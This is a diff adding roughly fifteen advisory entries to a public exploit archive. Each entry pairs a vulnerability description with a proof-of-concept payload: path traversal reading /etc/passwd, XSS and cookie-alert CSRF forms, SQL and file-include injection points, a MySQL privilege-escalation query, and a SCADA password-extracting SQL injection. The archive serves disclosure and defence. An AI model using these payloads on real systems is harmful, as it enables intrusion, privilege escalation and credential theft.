Updated 09_28_2014

files.csv

@@ -31314,3 +31314,20 @@ id,file,description,date,author,platform,type,port
 34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0
 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80
 34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80
+34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0
+34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0
+34784,platforms/php/webapps/34784.txt,"Micro CMS  1.0 'name' Field HTML Injection Vulnerability",2010-09-28,"Veerendra G.G",php,webapps,0
+34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x 'index.php' Cross Site Scripting Vulnerability",2010-09-28,"Yam Mesicka",php,webapps,0
+34786,platforms/php/webapps/34786.txt,"eCardMAX Multiple Cross Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0
+34787,platforms/php/webapps/34787.txt,"MODx  2.0.2-pl manager/index.php modahsh Parameter XSS",2010-09-29,"John Leitch",php,webapps,0
+34788,platforms/php/webapps/34788.txt,"MODx manager/controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0
+34789,platforms/php/webapps/34789.html,"GetSimple CMS  2.01 'admin/changedata.php' Cross Site Scripting Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0
+34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 'cont1' Parameter HTML Injection Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0
+34791,platforms/php/webapps/34791.txt,"Swinger Club Portal start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
+34792,platforms/php/webapps/34792.txt,"Swinger Club Portal start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0
+34793,platforms/php/webapps/34793.txt,"Top Paidmailer 'home.php' Remote File Include Vulnerability",2009-07-13,Moudi,php,webapps,0
+34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0
+34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0
+34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
+34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
+34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0

platforms/cgi/webapps/34794.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43636/info
+
+Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability.
+
+An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or obtain sensitive data that can aid in further attacks.
+
+Netbiter webSCADA WS100 and Netbiter webSCADA WS200 are vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
+http://www.example.com/gi-bin/read.cgi?file=/home/config/users.cfg
+http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2 

platforms/multiple/remote/34796.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43677/info
+
+MySQL is prone to a remote privilege-escalation vulnerability.
+
+An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.
+
+This issue affects versions prior to MySQL 5.1.50. 
+
+UPDATE db1.tbl1 /*!514900 ,mysql.user */
+SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
+WHERE mysql.user.User='user1'*/; 

platforms/php/webapps/34782.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43536/info
+
+Car Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Car Portal 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/autoportal10/index.php?page=en_Home&car=[SQL Injection] 

platforms/php/webapps/34783.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43552/info
+
+Ultimate Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/up/demo_page.php?action=vote&pid=test_poll&clr=1>&#039;><ScRiPt%20%0a%0d>alert(310294726286)%3B</ScRiPt>

platforms/php/webapps/34784.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/43556/info
+
+Micro CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Micro CMS 1.0 beta 1 is vulnerable; other versions may also be affected. 
+
+<script> alert('XSS-Test')</script>
+  in "* Name" textbox in comment section and fill other sections properly.

platforms/php/webapps/34785.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43560/info
+
+phpMyFAQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to phpMyFAQ 2.6.9 are vulnerable.
+
+http://www.example.com/index.php/"><script>alert("XSS")</script>

platforms/php/webapps/34786.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/43570/info
+
+eCardMAX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+eCardMAX 2006 and 2008 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/standard_2006/grabber.php?grab_url=1%3Cscript%3Ealert(1192520984065)%3C/script%3E
+
+http://www.example.com/standard_2006/members.php?cs_message=1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert(846719933916)%3B%3C/ScRiPt%3E
+
+http://www.example.com/standard_2006/resource/games/memory/memory.php?step=show_ins&cat=1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(1295561226285)%3B%3C/ScRiPt%3E
+
+http://www.www.example.com/gold_2008/resource/games/ephotohunt/ephotohunt.php?step=show_ins&cat=1>"><ScRiPt %0A%0D>alert(416118610559)%3B</ScRiPt>
+
+
+

platforms/php/webapps/34787.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43577/info
+
+MODx is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MODx 2.0.2-pl is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

platforms/php/webapps/34788.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43577/info
+ 
+MODx is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+ 
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+ 
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+MODx 2.0.2-pl is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 

platforms/php/webapps/34789.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43593/info
+
+GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+GetSimple CMS 2.01 is vulnerable; prior versions may also be affected.
+
+<form action="http://host/admin/changedata.php" method="post" name="main" > <input type="hidden" name="post-title" value='page title"><script>alert(document.cookie)</script>' /> <input type="hidden" name="post-id" value="test" /> <input type="hidden" name="post-metak" value="" /> <input type="hidden" name="post-metad" value="" /> <input type="hidden" name="post-parent" value="" /> <input type="hidden" name="post-template" value="template.php" /> <input type="hidden" name="post-menu" value="test" /> <input type="hidden" name="post-menu-order" value="" /> <input type="hidden" name="post-content" value="page html" /> <input type="hidden" name="existing-url" value="test" /> <input type="hidden" name="submitted" value="Save Updates" /> </form> <script> document.main.submit(); </script> 

platforms/php/webapps/34790.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/43597/info
+
+Pluck is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Pluck 4.6.3 is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/admin.php?module=blog&page=newpost" method="post" name="main" >
+
+<input type="hidden" name="cont1" value=&#039;1"><script>alert(document.cookie)</script>&#039; />
+<input type="hidden" name="cont2" value="no category" />
+<input type="hidden" name="cont3" value="" />
+<input type="submit" id="btn" name="Submit" value="Save" />
+
+</form>
+<script>

platforms/php/webapps/34791.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43622/info
+
+Swinger Club Portal is prone to an SQL-injection vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+http://www.example.com/anzeiger/start.php?go=rubrik&id=[SQL] 

platforms/php/webapps/34792.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43622/info
+ 
+Swinger Club Portal is prone to an SQL-injection vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+ 
+An attacker can exploit these vulnerabilities to access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+ 
+http://www.example.com/anzeiger/start.php?go=[RFI] 

platforms/php/webapps/34793.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43626/info
+
+Top Paidmailer is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+http://www.example.com/patch/home.php?page=[rfi] 

platforms/php/webapps/34795.txt

@@ -0,0 +1,7 @@
+source:  http://www.securityfocus.com/bid/43661/info
+
+WebAsyst Shop-Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script>

platforms/php/webapps/34797.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43679/info
+
+SurgeMail is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects version 4.3e; other versions may also be affected.
+
+http://www.example.com/surgeweb?username_ex="/><scri<script>alert(document.cookie);</script><input type="hidden 

platforms/php/webapps/34798.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/43680/info
+
+ITS SCADA is prone to an SQL-injection vulnerability.
+
+Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+User ID = 1' or 1=(select top 1 password from Users)--
+Password = blank